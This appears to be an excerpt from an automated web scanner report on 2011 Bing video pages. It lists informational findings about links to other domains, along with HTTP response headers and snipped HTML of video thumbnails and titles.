<img class="thumb thumbSize" src="http://img1.catalog.video.msn.com/Image.aspx?uuid=e177ac59-7cfe-4492-a8b4-55915bc801ac&w=160&h=90&so=4" />

<span class="motionThumbContainer">
...[SNIP]...
unt of snow residents in the Northeast can expect to see as well as a chilly system expected to hit the West." >

<img class="thumb thumbSize" src="http://img4.catalog.video.msn.com/Image.aspx?uuid=9496e26e-5c57-466b-bd0d-af7ab8a49f84&w=160&h=90&so=4" />

<span class="motionThumbContainer">
...[SNIP]...
streets of Cairo, Egypt, while continuing to demand the removal of President Mubarak. CNBC's Yousef Gamal El-Din reports." >

<img class="thumb thumbSize" src="http://img2.catalog.video.msn.com/Image.aspx?uuid=93f4a343-3ee5-49a2-bfa8-99e055385b9c&w=160&h=90&so=4" />

<span class="motionThumbContainer">
...[SNIP]...
;a gorilla in a British wildlife preserve that’s becoming an internet sensation by the way he walks like a man." >

<img class="thumb thumbSize" src="http://img2.catalog.video.msn.com/Image.aspx?uuid=38ae05db-21f0-4232-935c-dc0482988d92&w=160&h=90&so=4" />

<span class="motionThumbContainer">
...[SNIP]...
 fine diplomatic line with Egyptian officials as unrest grows in the streets of Cairo. NBC's Andrea Mitchell reports." >

<img class="thumb thumbSize" src="http://img2.catalog.video.msn.com/Image.aspx?uuid=9f5e7858-a321-4506-bd48-5fe5c11524e4&w=160&h=90&so=4" />

<span class="motionThumbContainer">
...[SNIP]...
<li><a href="http://g.live.com/9uxp9en-us/ftr1" onmousedown="return si_T('&ID=FD,52.1')">© 2011 Microsoft</a>
...[SNIP]...
<li><a href="http://go.microsoft.com/fwlink/?LinkId=74170" onmousedown="return si_T('&ID=FD,54.1')">Privacy</a> | </li><li><a href="http://g.redacted/0TO_/enus" onmousedown="return si_T('&ID=FD,56.1')">Legal</a> | </li><li><a href="http://advertising.microsoft.com/advertise-on-bing" onmousedown="return si_T('&ID=FD,58.1')">Advertise</a>
...[SNIP]...
<li><a href="http://g.redacted/AIPRIV/en-us" target="_blank" onmousedown="return si_T('&ID=FD,60.1')">About our ads</a>
...[SNIP]...
<li><a href="http://onlinehelp.microsoft.com/en-us/bing/ff808541.aspx" id="sb_help" target="_blank" onmousedown="return si_T('&ID=FD,62.1')">Help</a>
...[SNIP]...
</script>
<script type="text/javascript" src="http://img2.video.s-redacted/res/1.0.3710.02/js/BingPost.js"></script>
...[SNIP]...

22.406. http://www.bing.com/videos/watch/video/healthy-body-healthy-wallet/1d3rfv95o previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bing.com
Path:	/videos/watch/video/healthy-body-healthy-wallet/1d3rfv95o

Issue detail

The page was loaded from a URL containing a query string:

http://www.bing.com/videos/watch/video/healthy-body-healthy-wallet/1d3rfv95o?q=health+care&rel=msn&from=en-us_msnhp&form=msnrll&gt1=31036

The response contains the following links to other domains:

http://advertising.microsoft.com/advertise-on-bing
http://col.stj.s-redacted/br/sc/js/jquery/jquery-1.4.2.min.js
http://g.live.com/9uxp9en-us/ftr1
http://g.redacted/0TO_/enus
http://g.redacted/AIPRIV/en-us
http://go.microsoft.com/fwlink/?LinkId=74170
http://img1.catalog.video.redacted/Image.aspx?uuid=086e62e8-bf4c-4491-a61f-fb322fe0fb30&w=400&h=300&so=4
http://img1.catalog.video.redacted/Image.aspx?uuid=1c6e5217-2840-76fd-9659-1351ce5074a9&w=160&h=90&so=4
http://img1.catalog.video.redacted/Image.aspx?uuid=9ed95b9b-89f0-49ab-aa9c-71252bc7eee2&w=160&h=90&so=4
http://img1.catalog.video.redacted/Image.aspx?uuid=e177ac59-7cfe-4492-a8b4-55915bc801ac&w=160&h=90&so=4
http://img1.video.s-msn.com/res/1.0.3710.02/css/BingStyles.css
http://img1.video.s-msn.com/res/1.0.3710.02/i/videoModule/timer.gif
http://img2.catalog.video.redacted/Image.aspx?uuid=38ae05db-21f0-4232-935c-dc0482988d92&w=160&h=90&so=4
http://img2.catalog.video.redacted/Image.aspx?uuid=93f4a343-3ee5-49a2-bfa8-99e055385b9c&w=160&h=90&so=4
http://img2.catalog.video.redacted/Image.aspx?uuid=9f5e7858-a321-4506-bd48-5fe5c11524e4&w=160&h=90&so=4
http://img2.catalog.video.redacted/Image.aspx?uuid=a8c1a498-6626-473c-bd64-00a13b34440e&w=160&h=90&so=4
http://img2.catalog.video.redacted/Image.aspx?uuid=e825d2c4-c863-464f-b0d4-96a0a2b6da24&w=160&h=90&so=4
http://img2.video.s-msn.com/res/1.0.3710.02/js/BingPost.js
http://img2.video.s-msn.com/res/1.0.3710.02/js/VideoPre.js
http://img3.catalog.video.redacted/Image.aspx?uuid=608cb71f-dc78-4abf-8dd8-c30b68871b8f&w=160&h=90&so=4
http://img3.catalog.video.redacted/Image.aspx?uuid=7b4e347a-39e0-42f3-90ea-391cf5cf0b1c&w=160&h=90&so=4
http://img3.catalog.video.redacted/Image.aspx?uuid=f589e128-359f-43b7-8a73-1c9bf7292ee1&w=160&h=90&so=4
http://img4.catalog.video.redacted/Image.aspx?uuid=9496e26e-5c57-466b-bd0d-af7ab8a49f84&w=160&h=90&so=4
http://img4.catalog.video.redacted/Image.aspx?uuid=d0fa9133-4148-47e4-b080-5dc5e5dbe8bc&w=160&h=90&so=4
http://img4.catalog.video.redacted/Image.aspx?uuid=daf88b9e-6bc8-4995-919c-0eca80215ca7&w=160&h=90&so=4
http://img4.catalog.video.redacted/Image.aspx?uuid=e6d56a2d-a19d-41a0-b17e-45384969dc27&w=160&h=90&so=4
http://mail.live.com/
http://onlinehelp.microsoft.com/en-us/bing/ff808541.aspx
http://www.facebook.com/plugins/like.php?href=http%3a%2f%2fwww.bing.com%2fvideos%2fwatch%2fvideo%2fhealthy-body-healthy-wallet%2f1d3rfv95o%3ffrom%3den-us_fblike&locale=en_US&layout=button_count&show_faces=false&width=90&action=like&font=arial&colorscheme=dark&height=21
http://www.redacted/

Request

Response

HTTP/1.1 200 OK
Cache-Control: private, max-age=87
Content-Length: 109958
Content-Type: text/html; charset=utf-8
Expires: Sat, 29 Jan 2011 23:54:08 GMT
X-AspNet-Version: 2.0.50727
X-UA-Compatible: IE=7
Date: Sat, 29 Jan 2011 23:52:40 GMT
Connection: close
Set-Cookie: _SS=SID=AFAEE88F80244F31BA61267DDD63D882; domain=.bing.com; path=/
Set-Cookie: MUID=F741A5D3C8544F77A0B57D8439E7E06E; expires=Mon, 28-Jan-2013 23:52:40 GMT; domain=.bing.com; path=/
Set-Cookie: OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2c38df48ccabfb45a68f9bf51ef2a8bfa1; expires=Mon, 28-Jan-2013 23:52:40 GMT; domain=.bing.com; path=/
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
Set-Cookie: SRCHD=MS=1619992&D=1593447&AF=NOFORM; expires=Mon, 28-Jan-2013 23:52:40 GMT; domain=.bing.com; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta content="text/html; charset=utf-8" h
...[SNIP]...
<link rel="canonical" href="http://www.bing.com/videos/watch/video/healthy-body-healthy-wallet/1d3rfv95o" /><link rel="image_src" href="http://img1.catalog.video.redacted/Image.aspx?uuid=086e62e8-bf4c-4491-a61f-fb322fe0fb30&w=400&h=300&so=4" type="" title="" /><link rel="stylesheet" href="http://img1.video.s-redacted/res/1.0.3710.02/css/BingStyles.css" type="text/css"/><style type="text/css">
...[SNIP]...
</style><script type="text/javascript" src="http://col.stj.s-redacted/br/sc/js/jquery/jquery-1.4.2.min.js"></script><script type="text/javascript" src="http://img2.video.s-redacted/res/1.0.3710.02/js/VideoPre.js"></script>
...[SNIP]...
<li><a href="http://www.redacted/" onmousedown="return si_T('&ID=FD,39.1')">MSN</a></li><li><a href="http://mail.live.com/" onmousedown="return si_T('&ID=FD,41.1')">Hotmail</a>
...[SNIP]...
<div class="facebookLike"><iframe src="http://www.facebook.com/plugins/like.php?href=http%3a%2f%2fwww.bing.com%2fvideos%2fwatch%2fvideo%2fhealthy-body-healthy-wallet%2f1d3rfv95o%3ffrom%3den-us_fblike&locale=en_US&layout=button_count&show_faces=false&width=90&action=like&font=arial&colorscheme=dark&height=21" scrolling="no" frameborder="0" style="width:100%; height: 100%; overflow: hidden; border:none;" allowTransparency="true"></iframe>
...[SNIP]...
<span class="playmsg"><img class="playclock" src="http://img1.video.s-redacted/res/1.0.3710.02/i/videoModule/timer.gif" /><span class='count p1-4'>
...[SNIP]...
uss how health care reform will affect the health care sector and what stocks in the group are poised to benefit." >

<img class="thumb thumbSize" src="http://img3.catalog.video.msn.com/Image.aspx?uuid=608cb71f-dc78-4abf-8dd8-c30b68871b8f&w=160&h=90&so=4" />

<span class="motionThumbContainer">
...[SNIP]...
bill, yet they refuse to give up their own government-sponsored health care. Rep. Steve Israel talks about the hypocrisy." >

<img class="thumb thumbSize" src="http://img3.catalog.video.msn.com/Image.aspx?uuid=f589e128-359f-43b7-8a73-1c9bf7292ee1&w=160&h=90&so=4" />

<span class="motionThumbContainer">
...[SNIP]...
32;the responsibility of the community to deal with mental health issues because the consequences could affect any of us." >

<img class="thumb thumbSize" src="http://img2.catalog.video.msn.com/Image.aspx?uuid=e825d2c4-c863-464f-b0d4-96a0a2b6da24&w=160&h=90&so=4" />

<span class="motionThumbContainer">
...[SNIP]...
talks about the irony of the situation because Harris’ platform opposed a public option to buy federal health care." >

<img class="thumb thumbSize" src="http://img2.catalog.video.msn.com/Image.aspx?uuid=a8c1a498-6626-473c-bd64-00a13b34440e&w=160&h=90&so=4" />

<span class="motionThumbContainer">
...[SNIP]...
;s remarks on the U.S. health-care system during last night's State of the Union address. 
     Shalal..." >

<img class="thumb thumbSize" src="http://img4.catalog.video.msn.com/Image.aspx?uuid=daf88b9e-6bc8-4995-919c-0eca80215ca7&w=160&h=90&so=4" />

<span class="motionThumbContainer">
...[SNIP]...
nsurance-dollar-100-a-month/3xoea4h7?q=health%20care&rel=MSN" class="motionThumb playerUrl"
title="A new solution to health care eliminates insurance entirely." >

<img class="thumb thumbSize" src="http://img1.catalog.video.msn.com/Image.aspx?uuid=1c6e5217-2840-76fd-9659-1351ce5074a9&w=160&h=90&so=4" />

<span class="motionThumbContainer">
...[SNIP]...
ple with decent health insurance? Consumer Reports questions the Secretary of Health & Human Services, Kathleen Sebelius." >

<img class="thumb thumbSize" src="http://img4.catalog.video.msn.com/Image.aspx?uuid=e6d56a2d-a19d-41a0-b17e-45384969dc27&w=160&h=90&so=4" />

<span class="motionThumbContainer">
...[SNIP]...
hpa?q=health%20care&rel=MSN" class="motionThumb playerUrl"
title="Eight good things coming from the recently passed health care reform legislation." >

<img class="thumb thumbSize" src="http://img1.catalog.video.msn.com/Image.aspx?uuid=9ed95b9b-89f0-49ab-aa9c-71252bc7eee2&w=160&h=90&so=4" />

<span class="motionThumbContainer">
...[SNIP]...
k’s State of the Union from President Obama? Rep. Steve King (R-Iowa) joins msnbc’s Lawrence O’Donnell." >

<img class="thumb thumbSize" src="http://img3.catalog.video.msn.com/Image.aspx?uuid=7b4e347a-39e0-42f3-90ea-391cf5cf0b1c&w=160&h=90&so=4" />

<span class="motionThumbContainer">
...[SNIP]...

title="A New Hampshire health care provider says health care reform will increase demand for services from fewer providers." >

<img class="thumb thumbSize" src="http://img4.catalog.video.msn.com/Image.aspx?uuid=d0fa9133-4148-47e4-b080-5dc5e5dbe8bc&w=160&h=90&so=4" />

<span class="motionThumbContainer">
...[SNIP]...
en shot and killed while trying to storm the Egyptian interior ministry in Cairo. CBNC's Yousef Gamal El-Din reports." >

<img class="thumb thumbSize" src="http://img1.catalog.video.msn.com/Image.aspx?uuid=e177ac59-7cfe-4492-a8b4-55915bc801ac&w=160&h=90&so=4" />

<span class="motionThumbContainer">
...[SNIP]...
unt of snow residents in the Northeast can expect to see as well as a chilly system expected to hit the West." >

<img class="thumb thumbSize" src="http://img4.catalog.video.msn.com/Image.aspx?uuid=9496e26e-5c57-466b-bd0d-af7ab8a49f84&w=160&h=90&so=4" />

<span class="motionThumbContainer">
...[SNIP]...
streets of Cairo, Egypt, while continuing to demand the removal of President Mubarak. CNBC's Yousef Gamal El-Din reports." >

<img class="thumb thumbSize" src="http://img2.catalog.video.msn.com/Image.aspx?uuid=93f4a343-3ee5-49a2-bfa8-99e055385b9c&w=160&h=90&so=4" />

<span class="motionThumbContainer">
...[SNIP]...
;a gorilla in a British wildlife preserve that’s becoming an internet sensation by the way he walks like a man." >

<img class="thumb thumbSize" src="http://img2.catalog.video.msn.com/Image.aspx?uuid=38ae05db-21f0-4232-935c-dc0482988d92&w=160&h=90&so=4" />

<span class="motionThumbContainer">
...[SNIP]...
 fine diplomatic line with Egyptian officials as unrest grows in the streets of Cairo. NBC's Andrea Mitchell reports." >

<img class="thumb thumbSize" src="http://img2.catalog.video.msn.com/Image.aspx?uuid=9f5e7858-a321-4506-bd48-5fe5c11524e4&w=160&h=90&so=4" />

<span class="motionThumbContainer">
...[SNIP]...
<li><a href="http://g.live.com/9uxp9en-us/ftr1" onmousedown="return si_T('&ID=FD,52.1')">© 2011 Microsoft</a>
...[SNIP]...
<li><a href="http://go.microsoft.com/fwlink/?LinkId=74170" onmousedown="return si_T('&ID=FD,54.1')">Privacy</a> | </li><li><a href="http://g.redacted/0TO_/enus" onmousedown="return si_T('&ID=FD,56.1')">Legal</a> | </li><li><a href="http://advertising.microsoft.com/advertise-on-bing" onmousedown="return si_T('&ID=FD,58.1')">Advertise</a>
...[SNIP]...
<li><a href="http://g.redacted/AIPRIV/en-us" target="_blank" onmousedown="return si_T('&ID=FD,60.1')">About our ads</a>
...[SNIP]...
<li><a href="http://onlinehelp.microsoft.com/en-us/bing/ff808541.aspx" id="sb_help" target="_blank" onmousedown="return si_T('&ID=FD,62.1')">Help</a>
...[SNIP]...
</script>
<script type="text/javascript" src="http://img2.video.s-redacted/res/1.0.3710.02/js/BingPost.js"></script>
...[SNIP]...

22.407. http://www.bing.com/videos/watch/video/michaels-new-friend/17w7aehdt previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bing.com
Path:	/videos/watch/video/michaels-new-friend/17w7aehdt

Issue detail

The page was loaded from a URL containing a query string:

http://www.bing.com/videos/watch/video/michaels-new-friend/17w7aehdt?q=ricky+gervais+office&rel=msn&from=en-us_msnhp&form=MSNRLL&gt1=42008

The response contains the following links to other domains:

http://advertising.microsoft.com/advertise-on-bing
http://col.stj.s-redacted/br/sc/js/jquery/jquery-1.4.2.min.js
http://g.live.com/9uxp9en-us/ftr1
http://g.redacted/0TO_/enus
http://g.redacted/AIPRIV/en-us
http://go.microsoft.com/fwlink/?LinkId=74170
http://img1.catalog.video.redacted/Image.aspx?uuid=3468c015-6b46-4a4f-b5db-eb9787d7f766&w=160&h=90&so=4
http://img1.catalog.video.redacted/Image.aspx?uuid=e177ac59-7cfe-4492-a8b4-55915bc801ac&w=160&h=90&so=4
http://img1.video.s-msn.com/res/1.0.3710.02/css/BingStyles.css
http://img1.video.s-msn.com/res/1.0.3710.02/i/videoModule/timer.gif
http://img2.catalog.video.redacted/Image.aspx?uuid=121a8355-038a-40be-881e-7f6760f462e9&w=160&h=90&so=4
http://img2.catalog.video.redacted/Image.aspx?uuid=215589a9-1f97-49ed-b669-0060f611c09e&w=160&h=90&so=4
http://img2.catalog.video.redacted/Image.aspx?uuid=32ae1673-79d7-4501-bf2e-8f88e11f04d0&w=160&h=90&so=4
http://img2.catalog.video.redacted/Image.aspx?uuid=38ae05db-21f0-4232-935c-dc0482988d92&w=160&h=90&so=4
http://img2.catalog.video.redacted/Image.aspx?uuid=5bd07dd9-3590-4484-9621-391b29a1d90b&w=160&h=90&so=4
http://img2.catalog.video.redacted/Image.aspx?uuid=93f4a343-3ee5-49a2-bfa8-99e055385b9c&w=160&h=90&so=4
http://img2.catalog.video.redacted/Image.aspx?uuid=9f5e7858-a321-4506-bd48-5fe5c11524e4&w=160&h=90&so=4
http://img2.video.s-msn.com/res/1.0.3710.02/js/BingPost.js
http://img2.video.s-msn.com/res/1.0.3710.02/js/VideoPre.js
http://img3.catalog.video.redacted/Image.aspx?uuid=3cbead54-c048-4526-afe2-2b3b7f49ded7&w=160&h=90&so=4
http://img3.catalog.video.redacted/Image.aspx?uuid=ac03215c-5e7b-4c20-a6c7-9dede9becfd9&w=160&h=90&so=4
http://img3.catalog.video.redacted/Image.aspx?uuid=bea14d33-fd5b-496c-b0c1-70e719829103&w=160&h=90&so=4
http://img4.catalog.video.redacted/Image.aspx?uuid=2603b9e3-bb75-4d93-86a8-34cf8b5813e6&w=160&h=90&so=4
http://img4.catalog.video.redacted/Image.aspx?uuid=9496e26e-5c57-466b-bd0d-af7ab8a49f84&w=160&h=90&so=4
http://img4.catalog.video.redacted/Image.aspx?uuid=c9d40bcc-d4a5-4d79-8883-8175e2c77d29&w=160&h=90&so=4
http://mail.live.com/
http://onlinehelp.microsoft.com/en-us/bing/ff808541.aspx
http://www.facebook.com/plugins/like.php?href=http%3a%2f%2fwww.bing.com%2fvideos%2fwatch%2fvideo%2fmichaels-new-friend%2f17w7aehdt%3ffrom%3den-us_fblike&locale=en_US&layout=button_count&show_faces=false&width=90&action=like&font=arial&colorscheme=dark&height=21
http://www.hulu.com/the-office
http://www.hulu.com/watch?content_id=50117565
http://www.redacted/

Request

Response

HTTP/1.1 200 OK
Cache-Control: private, max-age=900
Content-Length: 104406
Content-Type: text/html; charset=utf-8
Expires: Sun, 30 Jan 2011 00:07:42 GMT
X-AspNet-Version: 2.0.50727
X-RenderTime: 0.078 secs
X-UA-Compatible: IE=7
Date: Sat, 29 Jan 2011 23:52:42 GMT
Connection: close
Set-Cookie: from=en-us_msnhp; domain=.bing.com; path=/videos
Set-Cookie: gt1=42008; domain=.bing.com; path=/videos
Set-Cookie: ocid=42008; domain=.bing.com; path=/videos
Set-Cookie: _SS=SID=7FC2B9E0CBF74E82B9CBB24E9A9E9968; domain=.bing.com; path=/
Set-Cookie: MUID=F741A5D3C8544F77A0B57D8439E7E06E; expires=Mon, 28-Jan-2013 23:52:41 GMT; domain=.bing.com; path=/
Set-Cookie: OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2c1794478ef78b42b7a8959b47602883b6; expires=Mon, 28-Jan-2013 23:52:41 GMT; domain=.bing.com; path=/
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
Set-Cookie: SRCHD=MS=1619992&D=1593447&AF=NOFORM; expires=Mon, 28-Jan-2013 23:52:41 GMT; domain=.bing.com; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta content="text/html; charset=utf-8" h
...[SNIP]...
<link rel="canonical" href="http://www.bing.com/videos/watch/video/michaels-new-friend/17w7aehdt" /><link rel="stylesheet" href="http://img1.video.s-redacted/res/1.0.3710.02/css/BingStyles.css" type="text/css"/><style type="text/css">
...[SNIP]...
</style><script type="text/javascript" src="http://col.stj.s-redacted/br/sc/js/jquery/jquery-1.4.2.min.js"></script><script type="text/javascript" src="http://img2.video.s-redacted/res/1.0.3710.02/js/VideoPre.js"></script>
...[SNIP]...
<li><a href="http://www.redacted/" onmousedown="return si_T('&ID=FD,39.1')">MSN</a></li><li><a href="http://mail.live.com/" onmousedown="return si_T('&ID=FD,41.1')">Hotmail</a>
...[SNIP]...
<div class="facebookLike"><iframe src="http://www.facebook.com/plugins/like.php?href=http%3a%2f%2fwww.bing.com%2fvideos%2fwatch%2fvideo%2fmichaels-new-friend%2f17w7aehdt%3ffrom%3den-us_fblike&locale=en_US&layout=button_count&show_faces=false&width=90&action=like&font=arial&colorscheme=dark&height=21" scrolling="no" frameborder="0" style="width:100%; height: 100%; overflow: hidden; border:none;" allowTransparency="true"></iframe>
...[SNIP]...
<span class="playmsg"><img class="playclock" src="http://img1.video.s-redacted/res/1.0.3710.02/i/videoModule/timer.gif" /><span class='count p1-4'>
...[SNIP]...
<div class="linkRow row">
<a class="relatedLink" href="http://www.hulu.com/the-office" data-instName="InfoRelatedLinks">Hulu - The Office</a>
...[SNIP]...
<div class="linkRow row">
<a class="relatedLink" href="http://www.hulu.com/watch?content_id=50117565" data-instName="InfoRelatedLinks">Hulu Watch Page - Michael's New Friend</a>
...[SNIP]...
class="motionThumb playerUrl"
title="The Office is so successful that Ricky doesn't know how many productions there are of it." >

<img class="thumb thumbSize" src="http://img2.catalog.video.msn.com/Image.aspx?uuid=5bd07dd9-3590-4484-9621-391b29a1d90b&w=160&h=90&so=4" />

<span class="motionThumbContainer">
...[SNIP]...
ase of new comedy 'The Invention Of Lying', we look at the world according to Ricky "The Office" Gervais." >

<img class="thumb thumbSize" src="http://img2.catalog.video.msn.com/Image.aspx?uuid=215589a9-1f97-49ed-b669-0060f611c09e&w=160&h=90&so=4" />

<span class="motionThumbContainer">
...[SNIP]...
the creator of the original BBC series, makes a surprise guest appearance on the American version starring Steve Carrell." >

<img class="thumb thumbSize" src="http://img1.catalog.video.msn.com/Image.aspx?uuid=3468c015-6b46-4a4f-b5db-eb9787d7f766&w=160&h=90&so=4" />

<span class="motionThumbContainer">
...[SNIP]...
earance on The Tonight Show and asks about Steve Carells decision to leave "The Office"  after next season." >

<img class="thumb thumbSize" src="http://img3.catalog.video.msn.com/Image.aspx?uuid=3cbead54-c048-4526-afe2-2b3b7f49ded7&w=160&h=90&so=4" />

<span class="motionThumbContainer">
...[SNIP]...
=ricky%20gervais%20office&rel=MSN" class="motionThumb playerUrl"
title="WatchMojo.com takes a look at the career of British comedian Ricky Gervais." >

<img class="thumb thumbSize" src="http://img4.catalog.video.msn.com/Image.aspx?uuid=c9d40bcc-d4a5-4d79-8883-8175e2c77d29&w=160&h=90&so=4" />

<span class="motionThumbContainer">
...[SNIP]...
"
title="The British funnyman brings his UK "Office" character overseas to go toe-to-toe with Steve Carell. See it!" >

<img class="thumb thumbSize" src="http://img2.catalog.video.msn.com/Image.aspx?uuid=121a8355-038a-40be-881e-7f6760f462e9&w=160&h=90&so=4" />

<span class="motionThumbContainer">
...[SNIP]...
y%20gervais%20office&rel=MSN" class="motionThumb playerUrl"
title="Slurring is part of the English colloquialisms that makes the shows so real." >

<img class="thumb thumbSize" src="http://img4.catalog.video.msn.com/Image.aspx?uuid=2603b9e3-bb75-4d93-86a8-34cf8b5813e6&w=160&h=90&so=4" />

<span class="motionThumbContainer">
...[SNIP]...
cky-gervais-out-of-the-office/17wu9a705?q=ricky%20gervais%20office&rel=MSN" class="motionThumb playerUrl"
title="Ricky has done a lot to get to this point." >

<img class="thumb thumbSize" src="http://img2.catalog.video.msn.com/Image.aspx?uuid=32ae1673-79d7-4501-bf2e-8f88e11f04d0&w=160&h=90&so=4" />

<span class="motionThumbContainer">
...[SNIP]...
class="motionThumb playerUrl"
title="Rickt Gervais talks to Jimmy about April Fool's Day and the many spin-offs of The Office." >

<img class="thumb thumbSize" src="http://img3.catalog.video.msn.com/Image.aspx?uuid=bea14d33-fd5b-496c-b0c1-70e719829103&w=160&h=90&so=4" />

<span class="motionThumbContainer">
...[SNIP]...
17walcvs7?q=ricky%20gervais%20office&rel=MSN" class="motionThumb playerUrl"
title="Ricky shares the secret to James Lipton's great interviewing skills." >

<img class="thumb thumbSize" src="http://img3.catalog.video.msn.com/Image.aspx?uuid=ac03215c-5e7b-4c20-a6c7-9dede9becfd9&w=160&h=90&so=4" />

<span class="motionThumbContainer">
...[SNIP]...
en shot and killed while trying to storm the Egyptian interior ministry in Cairo. CBNC's Yousef Gamal El-Din reports." >

<img class="thumb thumbSize" src="http://img1.catalog.video.msn.com/Image.aspx?uuid=e177ac59-7cfe-4492-a8b4-55915bc801ac&w=160&h=90&so=4" />

<span class="motionThumbContainer">
...[SNIP]...
unt of snow residents in the Northeast can expect to see as well as a chilly system expected to hit the West." >

<img class="thumb thumbSize" src="http://img4.catalog.video.msn.com/Image.aspx?uuid=9496e26e-5c57-466b-bd0d-af7ab8a49f84&w=160&h=90&so=4" />

<span class="motionThumbContainer">
...[SNIP]...
streets of Cairo, Egypt, while continuing to demand the removal of President Mubarak. CNBC's Yousef Gamal El-Din reports." >

<img class="thumb thumbSize" src="http://img2.catalog.video.msn.com/Image.aspx?uuid=93f4a343-3ee5-49a2-bfa8-99e055385b9c&w=160&h=90&so=4" />

<span class="motionThumbContainer">
...[SNIP]...
;a gorilla in a British wildlife preserve that’s becoming an internet sensation by the way he walks like a man." >

<img class="thumb thumbSize" src="http://img2.catalog.video.msn.com/Image.aspx?uuid=38ae05db-21f0-4232-935c-dc0482988d92&w=160&h=90&so=4" />

<span class="motionThumbContainer">
...[SNIP]...
 fine diplomatic line with Egyptian officials as unrest grows in the streets of Cairo. NBC's Andrea Mitchell reports." >

<img class="thumb thumbSize" src="http://img2.catalog.video.msn.com/Image.aspx?uuid=9f5e7858-a321-4506-bd48-5fe5c11524e4&w=160&h=90&so=4" />

<span class="motionThumbContainer">
...[SNIP]...
<li><a href="http://g.live.com/9uxp9en-us/ftr1" onmousedown="return si_T('&ID=FD,52.1')">© 2011 Microsoft</a>
...[SNIP]...
<li><a href="http://go.microsoft.com/fwlink/?LinkId=74170" onmousedown="return si_T('&ID=FD,54.1')">Privacy</a> | </li><li><a href="http://g.redacted/0TO_/enus" onmousedown="return si_T('&ID=FD,56.1')">Legal</a> | </li><li><a href="http://advertising.microsoft.com/advertise-on-bing" onmousedown="return si_T('&ID=FD,58.1')">Advertise</a>
...[SNIP]...
<li><a href="http://g.redacted/AIPRIV/en-us" target="_blank" onmousedown="return si_T('&ID=FD,60.1')">About our ads</a>
...[SNIP]...
<li><a href="http://onlinehelp.microsoft.com/en-us/bing/ff808541.aspx" id="sb_help" target="_blank" onmousedown="return si_T('&ID=FD,62.1')">Help</a>
...[SNIP]...
</script>
<script type="text/javascript" src="http://img2.video.s-redacted/res/1.0.3710.02/js/BingPost.js"></script>
...[SNIP]...

22.408. http://www.bing.com/videos/watch/video/michaels-new-friend/17w7aehdt previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bing.com
Path:	/videos/watch/video/michaels-new-friend/17w7aehdt

Issue detail

The page was loaded from a URL containing a query string:

http://www.bing.com/videos/watch/video/michaels-new-friend/17w7aehdt?q=ricky+gervais+office&rel=msn&from=en-us_msnhp&form=MSNRLL&gt1=42008

The response contains the following links to other domains:

http://advertising.microsoft.com/advertise-on-bing
http://col.stj.s-redacted/br/sc/js/jquery/jquery-1.4.2.min.js
http://g.live.com/9uxp9en-us/ftr1
http://g.redacted/0TO_/enus
http://g.redacted/AIPRIV/en-us
http://go.microsoft.com/fwlink/?LinkId=74170
http://img1.catalog.video.redacted/Image.aspx?uuid=3468c015-6b46-4a4f-b5db-eb9787d7f766&w=160&h=90&so=4
http://img1.catalog.video.redacted/Image.aspx?uuid=3566f221-6c01-4fb5-b8d1-4cca2d344157&w=160&h=90&so=4
http://img1.catalog.video.redacted/Image.aspx?uuid=e177ac59-7cfe-4492-a8b4-55915bc801ac&w=160&h=90&so=4
http://img1.video.s-msn.com/res/1.0.3710.02/css/BingStyles.css
http://img1.video.s-msn.com/res/1.0.3710.02/i/videoModule/timer.gif
http://img2.catalog.video.redacted/Image.aspx?uuid=121a8355-038a-40be-881e-7f6760f462e9&w=160&h=90&so=4
http://img2.catalog.video.redacted/Image.aspx?uuid=215589a9-1f97-49ed-b669-0060f611c09e&w=160&h=90&so=4
http://img2.catalog.video.redacted/Image.aspx?uuid=32ae1673-79d7-4501-bf2e-8f88e11f04d0&w=160&h=90&so=4
http://img2.catalog.video.redacted/Image.aspx?uuid=38ae05db-21f0-4232-935c-dc0482988d92&w=160&h=90&so=4
http://img2.catalog.video.redacted/Image.aspx?uuid=5bd07dd9-3590-4484-9621-391b29a1d90b&w=160&h=90&so=4
http://img2.catalog.video.redacted/Image.aspx?uuid=93f4a343-3ee5-49a2-bfa8-99e055385b9c&w=160&h=90&so=4
http://img2.catalog.video.redacted/Image.aspx?uuid=9f5e7858-a321-4506-bd48-5fe5c11524e4&w=160&h=90&so=4
http://img2.video.s-msn.com/res/1.0.3710.02/js/BingPost.js
http://img2.video.s-msn.com/res/1.0.3710.02/js/VideoPre.js
http://img3.catalog.video.redacted/Image.aspx?uuid=3cbead54-c048-4526-afe2-2b3b7f49ded7&w=160&h=90&so=4
http://img3.catalog.video.redacted/Image.aspx?uuid=bea14d33-fd5b-496c-b0c1-70e719829103&w=160&h=90&so=4
http://img4.catalog.video.redacted/Image.aspx?uuid=2603b9e3-bb75-4d93-86a8-34cf8b5813e6&w=160&h=90&so=4
http://img4.catalog.video.redacted/Image.aspx?uuid=9496e26e-5c57-466b-bd0d-af7ab8a49f84&w=160&h=90&so=4
http://img4.catalog.video.redacted/Image.aspx?uuid=c9d40bcc-d4a5-4d79-8883-8175e2c77d29&w=160&h=90&so=4
http://mail.live.com/
http://onlinehelp.microsoft.com/en-us/bing/ff808541.aspx
http://www.facebook.com/plugins/like.php?href=http%3a%2f%2fwww.bing.com%2fvideos%2fwatch%2fvideo%2fmichaels-new-friend%2f17w7aehdt%3ffrom%3den-us_fblike&locale=en_US&layout=button_count&show_faces=false&width=90&action=like&font=arial&colorscheme=dark&height=21
http://www.hulu.com/the-office
http://www.hulu.com/watch?content_id=50117565
http://www.redacted/

Request

Response

HTTP/1.1 200 OK
Cache-Control: private, max-age=699
Content-Length: 104592
Content-Type: text/html; charset=utf-8
